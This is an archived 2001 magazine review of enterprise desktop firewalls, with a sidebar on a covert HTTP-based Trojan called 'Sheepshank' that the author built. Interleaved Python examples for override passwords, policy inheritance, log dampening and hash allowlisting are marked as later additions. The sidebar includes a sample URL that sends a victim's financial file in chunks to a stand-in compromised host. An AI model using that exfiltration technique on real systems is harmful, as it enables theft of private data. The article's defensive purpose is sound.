Archive Date
[ 31-12-2001 ]
Category
[ Information Technologies ]
Sub-Category
[ Networking ]
http://hackyourself.com/showarticle.dyn?article=http://www.techweb.com/tech/security/20011203_security
No Desktop is an Island
November 12, 2001
By Michael J. DeMaria
Individual desktops may be the biggest security hole in your network. That includes desktops of all kinds: those used by home-based telecommuters and laptop-wielding road warriors, and your average office-based desktop PCs.
In the age of feudalism, medieval towns were surrounded by thick stone walls. Sometimes attackers would charge these perimeter walls, but this took a lot of time, and it was risky. It was also hard to do without drawing lots of attention. Eventually, bands of attackers would take the time to befriend someone on the inside. That person would quietly rob his neighbors, then throw the loot over the wall in the middle of the night. An inside job usually works better.
In this modern age of computer security, network-based Trojan programs are like the guys on the inside. Virus scanners can't always identify Trojan programs, especially those that are new or not so highly circulated that a signature has been found. The best protection against this sort of attack is a desktop firewall.
Desktop firewalls are effective against intruders lurking behind the main lines as well. Packet monitoring, intrusion detection, port blocking and application control can help prevent Trojan viruses and other nasty programs from creeping into your network.
Getting a Trojan onto someone's computer isn't hard -- just look at the e-mail viruses and worms going around. All it takes is an e-mail attachment with something cute, like dancing hamsters. Or, if you really have an ax to grind, loading a Trojan using a simple floppy is easy enough. Before we began our testing for this review, we did an unscientific experiment. We took just 17 seconds to walk up to a PC in the lab, install a Sub7 Trojan off a floppy disk and walk away whistling.
But keep in mind, a firewall won't protect you from a Trojan that is aimed at unlinking every file from the system. Using antivirus software in tandem with personal firewalls is a must.
The Roundup
In the review of desktop firewalls we ran last year, we tested products from F-Secure Corp., InfoExpress, Sybergen Networks and Network ICE Corp. This year we have the same four vendors going against each other, though two have changed their names. Network ICE was recently acquired by Internet Security Systems (ISS), and Sybergen is now known as Sygate Technologies.
We also asked Symantec Corp. to participate, but its product doesn't have centralized reporting. Securitae Corp. was also invited, but its product was in beta at test time. Finally, we tried getting Zone Labs to participate but, like the last time around, the company was still working on adding centralized management. Like Securitae, ZoneAlarm was in beta during our test period.
Last year InfoExpress' CyberArmor Suite 1.1 won our Editor's Choice award. CyberArmor repeats this year with the best protection capabilities, great support for mobile users and good policy management. Sygate Secure Enterprise has improved markedly over the past year and is now neck and neck with CyberArmor in most features. The InfoExpress and Sygate products both support fault-tolerant servers, while the other two do not. ISS and F-Secure haven't advanced much since last year, and offer less protection than their competitors.
All the products we tested work in a similar way. Each desktop is loaded with a client agent that sits as a shim, intercepting and inspecting all data going into or out of the machine. These agents inspect, protect and send back status reports. A back-end server (or multiple servers) sits on the LAN, distributing policies and maintaining log reports.
Before rolling out a desktop firewall program, allocate the appropriate resources for the support and helpdesk issues that will inevitably arise. If you block certain programs from running, users will call up and ask, "Why is the network broken?" Provide user education on how the firewall works and what sort of traffic is blocked. You'll definitely get a lot of questions from home-based telecommuters if you don't prepare your users.
We looked at the firewalls from the viewpoint of a corporation planning to roll out 5,000 desktop firewalls in phases, by department. Our grading criteria included policy management, protection, mobile-user support, price and reporting. We tested from the perspective of a corporate IT office with full say over the security and policy files, letting the user have as little interaction with the firewall as possible.
All the products we tested offer standalone installers with the necessary configurations already in place (such as the IP address of the administration server). We wanted to see how well you could create different policies for multiple users or machines. For example, the engineers -- and nobody else -- may need FTP access. Every product supports this capability. We also tested how easy it is to switch users to different groups, in case of reorganizations, merging departments or individual job changes.
Each solution we looked at supports dynamic IP addresses. InfoExpress and Sygate offer the best support for mobile users, allowing for multiple policy files depending on the location. InfoExpress offers more granularity than Sygate. F-Secure allows for four policy files per client, but the catch is the user must switch them manually. ISS doesn't offer any support for multiple policy files based on location.
Application Control a Must
The use of port blocking as a primary mechanism for securing desktops is way over. It used to be that if you wanted to stop people from connecting to a Trojan-infected laptop, you could simply block all incoming connections. Not anymore.
Some Trojans will use outgoing connections with traffic that looks legitimate to fool firewalls and intrusion-detection systems. Other Trojans, like Sub7, can e-mail out key grabs or make announcements to IRC (Internet Relay Chat) channels. All this traffic looks legitimate, so simply blocking outbound traffic to remote Port 80 or 25 won't work. (For more, see our online-only story "How Trojan Viruses Work -- a New Wrinkle.")
In this era of smart viruses, the only truly worthwhile desktop firewall supports application control. This firewall will grant individual executables access to the network. Along with that, the firewall needs to use a checksum, such as an MD5 (Message Digest 5) hash, to make sure the executable itself hasn't been modified or compromised. InfoExpress and Sygate both offer this capability; F-Secure and ISS don't.
The selection of desktop firewalls dwindles dramatically when you look for centralized management. By the end of the year, only six such products will be available -- the four in this review plus those of Securitae and Zone Labs. These products vary in price from as little as $37 per seat to as much as $80, depending on quantity. That's a small price to pay for the protection they offer.
Perimeter firewalls can't protect your network entirely now that the baddies have figured out it's much easier to get by individual desktops. Antivirus software is helpful, but its makers are always playing catch-up with the latest Trojan programs. Intrusion-detection systems may not catch the latest Trojan either. And once a Trojan gets onto your network, it can spread. Still, desktop firewalls are a critical line of defense in the never-ending battle to keep your network secure.
InfoExpress CyberArmor Suite 2.1 Enterprise Personal Firewall
Although CyberArmor won our Editor's Choice award, InfoExpress should beware. The other vendors are closing in. CyberArmor still demonstrates the best ability to switch between multiple policies and has the best application control among our test group.
The suite comprises six components. CyberArmor Policy Expert is used to edit policy files. CyberServer is the management software for distributing policies and accepting log file uploads. CyberBridge is used in conjunction with Microsoft Internet Information Server (IIS) to simplify policy downloads and make it easier to switch users to different groups. CyberConsole and CyberReports are for viewing users and alerts. CyberArmor Personal Firewall is the agent software.
The executable blocking is among the most flexible we tested this time out. It uses Perl-style regular expressions to block or allow programs by name, wildcard and command-line argument. You can also block spawned programs, including those that might come with e-mail attachments. This would let you block .vbs scripts from Microsoft Outlook Express, but allow .shs files from Eudora if you like.
The user can be informed of a reason the program was prevented from running, and the administrator can decide whether to generate an alarm to the user and the central management station.
You can verify executables with an MD5-based checksum. The policy editor lets you scan an executable or directory and builds a database of checksums. CyberArmor's application control is solid. It was able to block the Sheepshank Trojan.
The Policy Expert's interface has been improved over that of version 1.1, which we tested last year. It was simplified to ease the creation of configurations and templates, which are the sets of rules you want to implement. The different configurations control network settings, download servers, VPNs and so forth. All changes in a template affect the configurations built from it. The capability to define one set of policies and have it take effect across multiple remote offices is a real boon.
As in the earlier version, there are multiple levels of complexity, from simple clicking check boxes to manually editing policies. Most of the new interface is wizard-based, so it doesn't supply you with every option possible. You can go back to the version 1.1 interface for more fine-tuned control, but it's a bit ugly because you're basically editing text files. Editing multiple policies has become much more straightforward. You can create installers for these different configurations.
The newest component is CyberBridge, which greatly simplifies changing users and groups. CyberBridge works with IIS via a PHP script to link the Web server with the policy and user database. Via CyberConsole, you can move individual users into a different group or move all the users in one group into a different group. Then, when the clients check for updates from the CyberServer, it changes groups and gets the new policy file.
When the user installs the client software, you can have the user enter his or her user name and e-mail address. On one of the clients, we entered mdemaria, which we could immediately see in the CyberConsole. You can then lock the user from changing the user name and password.
You can also set a password on the CyberArmor Personal Firewall configuration screen, so the user can't modify any of the settings. These settings include shutting off the firewall, and changing the update interval or trusted IP addresses. You don't want your users turning off the firewall on a whim. But what if you have a salesperson at a remote site, with no access back to the corporate network, and he or she needs to let someone connect to his machine? CyberArmor allows a one-time override for this type of situation.
The client generates a one-time cookie, which is an eight-digit number. You then use the Policy Expert to type the first four characters of the configuration password and the cookie provided by the user. This produces a one-time eight-character password. The user can use this password to override the normal setup password and change his or her settings. The only thing you can't change with the one-time password is any of the other setup passwords.
CyberArmor does not let you generate a one-time password without knowing part of the setup password. CyberArmor is the only product we tested that allows for this emergency-override capability, even when the client can't connect back to the network. This is a handy feature, especially if someone is stuck in the field.
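The override exchange described above, as an added example that is not InfoExpress's code. The review gives only the shape of the mechanism (eight-digit client cookie, part of the configuration password typed in by the administrator, eight-character password honoured once); the derivation used here, HMAC-SHA256 truncated into a readable alphabet, and the helper names `override_secret`, `derive_override` and `OverrideVerifier` are assumptions for illustration, not the product's published algorithm.

```python
"""One-time override password for a client that cannot reach the network.

Added example, hypothetical derivation: the client shows a cookie, the
administrator combines a secret with it, and the client accepts the
resulting password exactly once.
"""
import hashlib
import hmac
import secrets

ALPHABET = "ABCDEFGHJKLMNPQRSTUVWXYZ23456789"  # 32 unambiguous symbols
PASSWORD_LEN = 8
COOKIE_DIGITS = 8


def override_secret(config_password: str) -> str:
    """Portion of the configuration password both sides feed into the derivation.
    The review says the first four characters are typed in; that is modelled here."""
    return config_password[:4]


def new_cookie() -> str:
    """Client side: a fresh, unpredictable eight-digit cookie shown to the user."""
    return f"{secrets.randbelow(10 ** COOKIE_DIGITS):0{COOKIE_DIGITS}d}"


def derive_override(secret: str, cookie: str) -> str:
    """Administrator side (and client side, for checking): secret + cookie -> password."""
    if len(cookie) != COOKIE_DIGITS or not cookie.isdigit():
        raise ValueError("cookie must be exactly eight digits")
    mac = hmac.new(secret.encode(), cookie.encode(), hashlib.sha256).digest()
    return "".join(ALPHABET[b % len(ALPHABET)] for b in mac[:PASSWORD_LEN])


class OverrideVerifier:
    """Client-side state: one outstanding cookie, each cookie redeemable once."""

    def __init__(self, config_password: str):
        self._secret = override_secret(config_password)
        self._pending = None
        self._used = set()

    def issue_cookie(self) -> str:
        self._pending = new_cookie()
        return self._pending

    def verify(self, candidate: str) -> bool:
        cookie = self._pending
        if cookie is None or cookie in self._used:
            return False
        expected = derive_override(self._secret, cookie)
        ok = hmac.compare_digest(expected, candidate)
        if ok:
            self._used.add(cookie)  # burn it: the same password will not work again
            self._pending = None
        return ok


def walkthrough(config_password: str = "hunter2-lab-config"):
    """The whole exchange: user reads cookie, admin derives password, client checks it."""
    client = OverrideVerifier(config_password)
    cookie = client.issue_cookie()  # the stranded user reads this to the administrator
    password = derive_override(override_secret(config_password), cookie)
    first = client.verify(password)   # accepted
    replay = client.verify(password)  # same password a second time: refused
    return {"cookie": cookie, "password": password, "first": first, "replay": replay}


if __name__ == "__main__":
    print(walkthrough())
```

Two properties carry the scheme: the password cannot be produced without the secret, and the client refuses a cookie after its first successful use. The strength of any such design is bounded by the entropy of whatever secret portion is fed into the derivation, so a deployment choosing it would want that portion long and random.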
CyberArmor Suite 2.1 Enterprise Personal Firewall. InfoExpress, (650) 623-0260; fax (650) 623-0268. www.infoexpress.com
Sygate Technologies Sygate Secure Enterprise and Sygate Management Server
The Sybergen product came in last place in our review last year. This year it comes back with a new name -- Sygate Secure Enterprise -- and is much improved. The portion of the suite we tested is called Sygate Management Server. Our testing revealed a cleaner interface, better documentation and easier policy creation and management than previous iterations. Sygate now also supports failover policy and database servers.
This product requires a SQL or Oracle database and IIS, which powers the back end, as IIS also does for CyberArmor and for ISS' BlackICE Agent and ICEcap Manager. The management is done through a Java applet. The applet was manageable, but the manual process of locking and unlocking groups was sluggish. Locking prevents two administrators from working on the same group at once.
The philosophy behind the administration user interface is inheritance. Each group inherits the policies of the parent group. For example, you can create a group of computers called Sales, and inside that create another group called East Coast and West Coast. Changes to the Sales group will also affect East Coast and West Coast.
There are two ways of grouping things together: by computers or by users. Computers autoregister with the administration server. Users can be added manually or imported from a Windows NT domain or LDAP server. You can then set policy files on users or computers. This way you can grant more freedom or give users access to different applications across your domain. A computer policy file overrides the user policy. In the course of our testing we found switching users from group to group easy.
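The inheritance and grouping behaviour the two paragraphs above describe, as an added example (a hypothetical model written for this page, not Sygate's data structures). It shows a child group inheriting its parent's settings and overriding some, a computer policy overriding a user policy, and a group moved to a new parent picking up the new effective policy. The group names follow the review's Sales / East Coast / West Coast example; the setting names are constructed.

```python
"""Group-based policy inheritance for desktop firewall agents (added example)."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

Settings = Dict[str, object]


@dataclass
class PolicyGroup:
    name: str
    parent: Optional["PolicyGroup"] = None
    local: Settings = field(default_factory=dict)  # settings set on this group only

    def chain(self) -> List["PolicyGroup"]:
        """Root first, this group last."""
        nodes, node = [], self
        while node is not None:
            nodes.append(node)
            node = node.parent
        return list(reversed(nodes))

    def effective(self) -> Settings:
        """Merge down the chain; a child's value replaces the parent's."""
        merged: Settings = {}
        for group in self.chain():
            merged.update(group.local)
        return merged

    def origin(self, key: str) -> Optional[str]:
        """Which group supplies `key`: the inherited-versus-local view an admin console shows."""
        for group in reversed(self.chain()):
            if key in group.local:
                return group.name
        return None


def resolve(user_group: Optional[PolicyGroup],
            computer_group: Optional[PolicyGroup]) -> Settings:
    """User policy first, then computer policy on top, so the computer wins conflicts."""
    result: Settings = {}
    for group in (user_group, computer_group):
        if group is not None:
            result.update(group.effective())
    return result


def move_group(group: PolicyGroup, new_parent: PolicyGroup) -> PolicyGroup:
    """Reassign a group to a new parent (returns a copy so the sample tree is untouched)."""
    return PolicyGroup(group.name, parent=new_parent, local=dict(group.local))


# Constructed sample hierarchy following the review's example.
ROOT = PolicyGroup("All", local={"allow_ftp": False, "allow_telnet_out": False, "block_inbound": True})
SALES = PolicyGroup("Sales", parent=ROOT, local={"allow_im": True})
EAST = PolicyGroup("East Coast", parent=SALES, local={"allow_ftp": True})
WEST = PolicyGroup("West Coast", parent=SALES)
ENGINEERING = PolicyGroup("Engineering", parent=ROOT, local={"allow_ftp": True})

if __name__ == "__main__":
    print("East Coast:", EAST.effective(), "| allow_ftp set by", EAST.origin("allow_ftp"))
    print("user=East Coast, computer=West Coast:", resolve(EAST, WEST))
    print("West Coast moved under Engineering:", move_group(WEST, ENGINEERING).effective())
```

The order of the two `update` calls in `resolve` is the whole precedence rule: whichever policy is merged last wins, and the review states that is the computer policy.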
Setting multiple policy files depending on the user's location is also easy. This can be done by looking at the gateway MAC (Media Access Control) address, client IP address, subnet or MAC address of a DHCP server. It's nice but not as full-featured as CyberArmor, which lets you do all this, as well as resolve DNS and check VPN registry keys. Like CyberArmor, Sygate Management Server was able to stop the Sheepshank Trojan.
The reporting in Sygate Secure Enterprise has improved. You can more easily generate reports for individual users, groups, computers or the entire organization. If you want a more in-depth look, you can view each blocked attempt. Rules are assigned a severity level from 0 to 15. You can sort the logs by severity, with the more important attacks and violations bubbling to the top. We made blocking outgoing telnet the highest severity and incoming TCP 80 the lowest. Each time we ran telnet, it showed up at the top of the report. The graphical report generation is a nice touch for making Microsoft PowerPoint slides.
You can add rules based on application name, path, file size, checksum, network information, ports, protocols or time. For example, you might want to shut down both incoming and outgoing traffic whenever your employees are out of the building -- perhaps nights and weekends. You can also create rules that apply only when the VPN connection is up. You might want to have instant-messaging software active only when the VPN tunnel is up, for example. InfoExpress' CyberArmor is the only other vendor with this feature.
If multiple rules have the same priority, the rule created first gets priority. This was a bit irritating during our testing. If you don't plan ahead, introducing a fresh rule for the top of the list can be tough. It would be handy to have a way to change the order of rules with the same severity level more easily.
Sygate Secure Enterprise and Sygate Management Server. Sygate Technologies, 1-877-923-7436; fax (510) 742-2699. www.sygate.com
F-Secure Distributed Firewall
Once again, we came away from our tests of F-Secure's product convinced it is best-suited for inside the corporate LAN. It's not going to be of much use to mobile users, at least not in this iteration.
You can create four profiles: Home, Office, Aux1 and Aux2. The user selects which profile reflects his or her current location. There's no support for real application control, which means the Sheepshank Trojan was able to get through. The limited application control F-Secure does offer is based on the run-time name. The product also lacks integrity checking (such as MD5 checksum), so any program that is on the approved list could be modified.
Like Sygate Management Server, F-Secure's administration supports inheritance. You can create a policy domain, and all subdomains or computers inside it inherit the traits of the parent. Settings inherited from the parent are colored gray; settings unique to the current domain are in black. This makes it easy to change settings and see where the changes occur.
Rule setting is rudimentary at best. Rules are still a matter of cutting off certain parts of the network from other parts. Devices are identified by either IP address, DNS name, WINS name or VPN key.
This product is definitely falling behind the competition, but there are a few bright spots. The user-management capabilities are still quite good. Also, you can centrally manage your antivirus, VPN, firewall and smartcards from one console. In a corporate environment where desktops are stationary, that's a plus. But overall, F-Secure is limited to port blocking.
F-Secure Distributed Firewall. F-Secure, (408) 938-6700, (888) 718-4928; fax (408) 938-6701. www.f-secure.com
Internet Security Systems ICEcap Manager with BlackICE Agent
This time out, the ISS duo comes in last. BlackICE still does not support multiple policy files per agent, and it doesn't have any support for application control, though this is planned for future releases. On the plus side, the ICEcap management-server user interface has been refined, and it is much cleaner and less confusing.
The agent program is an inbound firewall and IDS product. It can block ports for incoming traffic but not outgoing. For example, we couldn't block outbound telnet traffic. During our testing, we loaded Sub7 on the agent and tried to connect to it from our attack machine. BlackICE did identify the signature and blocked it. But as with many antivirus solutions, this approach doesn't work against unknown Trojans. We did the same thing with Sheepshank, and we were able to get through easily.
At the heart of this suite is the management console, called ICEcap. ICEcap is controlled through a Web server running IIS and a SQL database. One of the new features in ICEcap is the addition of Help Wizards, a combination of flow charts and documentation to facilitate setting up the software. It's a good thing this feature has been added, as this is still the most complex product to set up among our test group.
During setup, policy files were flying all over the place. There are separate policies for firewall rules, IDS rules, installation configurations and response rules, and we weren't sure how they all interacted without slogging through the docs to figure out what goes where.
The reporting capabilities within ICEcap remain solid. The graphs are perfect for overhead projection at security meetings. And drill-down capabilities are excellent. For example, if you're looking at the top attack signatures, you can click on the most common signature and see all the clients that reported the attack.
BlackICE also includes an event dampener, so if two attacks occur within a set time frame, they're treated and reported as one attack (the total number is still shown). During testing, we were able to see that we had 24 Sub7 attacks, but that each set of attacks occurred only three times. The first day of testing we had four hits, the second day eight and the third day 12 in a row. The final neat thing is that you can make SQL queries directly from the management interface; no other vendor offers this feature. For those of you who know some SQL, it's a nice feature for quick and dirty queries.
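Two pieces of the reporting described on this page, severity-ranked logs (the Sygate section) and the event dampener (the BlackICE paragraph above), as one added example written for this page, not any vendor's code. The log format and the sample lines are constructed; real agents upload their own formats. The dampener collapses repeats of the same host-and-rule pair that fall within a window of the burst's first event into a single report carrying a count.

```python
"""Severity-ranked reporting and event dampening over firewall agent logs (added example)."""
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample upload: timestamp then key=value pairs. Not a real product format.
SAMPLE_LOG = """\
2001-11-12T09:00:01 host=lab-pc1 rule=block-telnet-out sev=15 proto=tcp dst=10.0.0.5:23
2001-11-12T09:00:03 host=lab-pc1 rule=block-telnet-out sev=15 proto=tcp dst=10.0.0.5:23
2001-11-12T09:00:04 host=lab-pc1 rule=block-telnet-out sev=15 proto=tcp dst=10.0.0.5:23
2001-11-12T09:00:20 host=lab-pc2 rule=block-http-in sev=0 proto=tcp src=10.0.0.9:4411
2001-11-12T09:02:30 host=lab-pc1 rule=sub7-signature sev=12 proto=tcp src=10.0.0.9:27374
2001-11-12T09:02:31 host=lab-pc1 rule=sub7-signature sev=12 proto=tcp src=10.0.0.9:27374
2001-11-12T09:10:00 host=lab-pc1 rule=sub7-signature sev=12 proto=tcp src=10.0.0.9:27374
"""


def parse(text: str) -> List[Dict[str, str]]:
    """One dict per line; the first token is the timestamp, the rest are key=value."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *pairs = line.split()
        event = {"ts": ts}
        for pair in pairs:
            key, _, value = pair.partition("=")
            event[key] = value
        events.append(event)
    return events


def by_severity(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Highest severity first; the sort is stable, so ties keep log order."""
    return sorted(events, key=lambda e: -int(e["sev"]))


def dampen(events: List[Dict[str, str]], window: timedelta = timedelta(seconds=60)) -> List[Dict]:
    """Collapse repeats of (host, rule) within `window` of a burst's first event.
    Input is assumed chronological, as an agent's upload would be."""
    reports: List[Dict] = []
    open_burst: Dict[tuple, int] = {}  # (host, rule) -> index of its current report
    for event in events:
        key = (event["host"], event["rule"])
        t = datetime.fromisoformat(event["ts"])
        idx = open_burst.get(key)
        if idx is not None and t - reports[idx]["first"] <= window:
            reports[idx]["count"] += 1
            reports[idx]["last"] = t
        else:
            reports.append({"host": event["host"], "rule": event["rule"],
                            "sev": int(event["sev"]), "first": t, "last": t, "count": 1})
            open_burst[key] = len(reports) - 1
    return reports


def report(text: str, window: timedelta = timedelta(seconds=60)) -> List[Dict]:
    """Dampened reports, most severe first: what a console would put at the top."""
    return sorted(dampen(parse(text), window), key=lambda r: -r["sev"])


if __name__ == "__main__":
    for r in report(SAMPLE_LOG):
        print(f"sev={r['sev']:2d} {r['host']} {r['rule']} x{r['count']} "
              f"{r['first'].time()}..{r['last'].time()}")
```

The window is measured from the first event of a burst rather than from the previous repeat, so a slow but continuous trickle cannot stay hidden inside one report forever; a practitioner tuning this would pick the window to match the reporting interval of the agents.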
BlackICE Agent and ICEcap Manager. Internet Security Systems, (650) 532-4100; fax (650) 341-0719. www.networkice.com
Michael J. DeMaria is an associate technology editor based at Network Computing's Syracuse University Real-World Labs®. Send your comments on this article to him at mdemaria@nwc.com.
How Trojan Viruses Work -- A New Wrinkle
Traditionally, Trojan programs wait for incoming connections to the compromised machine. Because the Trojan is just a regular program, it has full access to whatever a normal program can do: It can read files, delete files, access the network, upload files and so forth. You rely on an antivirus program to find and disinfect a Trojan, and use a firewall to control and contain it. On a corporate firewall, you block all the unnecessary ports (both in and out), and limit the destination of incoming connections.
On a desktop machine, you can set it up so all incoming connections are dropped. This will defeat most inbound Trojan programs, such as BackOrifice or Sub 7. But now there's a new method available that gets around port blocking and intrusion detection: Make an outbound connection to an already compromised machine using legitimate network traffic.
The idea of an outbound connection with legitimate traffic is something I came up with over the past year. I don't have any experience with network coding or Winsock programming, so for this project I was assisted by Ifeanyi Echeruo in developing a Trojan program we dubbed "Sheepshank." It took Echeruo, a graduate student in the Engineering College at Syracuse University, less than three hours to get a working prototype of Sheepshank up and running. When run, this program makes an HTTP GET request to a Web server, just like Netscape Communicator or Microsoft Internet Explorer would do. The Web server returns a Web page, which has keywords in it. For example, the page may say "<html><body>clearwallpaper</body></html>." The Trojan ignores the parts that it doesn't understand, and sees the keyword clearwallpaper. Source code, precompiled binaries and example usage are available at nwc.syr.edu/~mdemaria/sheepshank.
While clearing the wallpaper may sound trivial, there are many other things you can do. For example, you can upload the contents of c:\quicken\myfinancialdata in segments by using "http://www.compromised.comp/upload.cgi?file=myfinancialdata&payload=AAD3B4351404EE" and just have a cgi script on the compromised machine piece the chunks together. If a network analyzer is used, it all looks like normal HTTP and HTML traffic. And if you select the keywords carefully, and change some of the command strings, then intrusion-detection systems would have a very difficult time stopping it. Because this is all valid Web traffic, there's very little chance you'll want to block outbound Port 80. This technique is more traceable than most Trojans, because it requires an already compromised machine. A savvy intruder will have the messages bounce around multiple locations on the Internet to avoid being traced.
What's the solution? Well, you must go beyond port blocking and intrusion detection, and that next step is in application control. You should specify which programs on each machine are allowed to access the network. Furthermore, be sure there's a way to check application integrity, otherwise it's possible to bundle a Trojan onto an approved application. Many vendors accomplish this by doing an MD5 hash on the executable -- if the executable is modified, the hashes won't match up.
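The application-control check this sidebar (and the "Application Control a Must" section of the main review) calls for, as an added example written for this page, not the code of any vendor reviewed. It scans a directory to build a name-to-digest allowlist, the way the review says CyberArmor's policy editor does, and then answers whether a program asking for network access is both on the list and unmodified. SHA-256 is used where the article mentions MD5, since MD5 is no longer collision-resistant; the shape of the check is the same. Temporary files with constructed contents stand in for real executables.

```python
"""Application control by executable hash (added example)."""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, Tuple


def digest(path: Path) -> str:
    """SHA-256 of a file, streamed so large executables are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_allowlist(directory: Path, patterns: Tuple[str, ...] = ("*.exe",)) -> Dict[str, str]:
    """Scan a directory and record lower-cased file name -> digest for approved programs."""
    allow: Dict[str, str] = {}
    for pattern in patterns:
        for p in sorted(directory.glob(pattern)):
            allow[p.name.lower()] = digest(p)
    return allow


def network_allowed(path: Path, allowlist: Dict[str, str]) -> Tuple[bool, str]:
    """Decide by name AND integrity: an unknown name or a changed hash is denied.
    Name alone is what the review calls run-time-name matching, which a
    modified or replaced binary passes; the hash comparison is what closes that gap."""
    expected = allowlist.get(path.name.lower())
    if expected is None:
        return False, "not on allowlist"
    if digest(path) != expected:
        return False, "hash mismatch: executable modified"
    return True, "ok"


def demo() -> Dict[str, Tuple[bool, str]]:
    """Approve two programs, then try a modified copy and an unknown program."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        browser = d / "browser.exe"
        browser.write_bytes(b"MZ constructed browser image")   # constructed stand-in
        mail = d / "mail.exe"
        mail.write_bytes(b"MZ constructed mail client image")  # constructed stand-in
        allowlist = build_allowlist(d)

        results = {"browser_clean": network_allowed(browser, allowlist)}

        # A Trojan bundled into the approved program: same name, different bytes.
        browser.write_bytes(b"MZ constructed browser image" + b"\x00 appended stub")
        results["browser_modified"] = network_allowed(browser, allowlist)

        # An unknown program that is not on the list at all.
        stranger = d / "update.exe"
        stranger.write_bytes(b"MZ constructed mail client image")
        results["unknown_name"] = network_allowed(stranger, allowlist)
        return results


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{name}: {'ALLOW' if ok else 'DENY'} ({reason})")
```

In a real agent the allowlist lives in the distributed policy and the digest is recomputed when a process first opens a socket, so a legitimate update to an approved program shows up as a denial until the policy is rebuilt; that is the helpdesk load the review warns about, and it is the price of the check catching a modified binary.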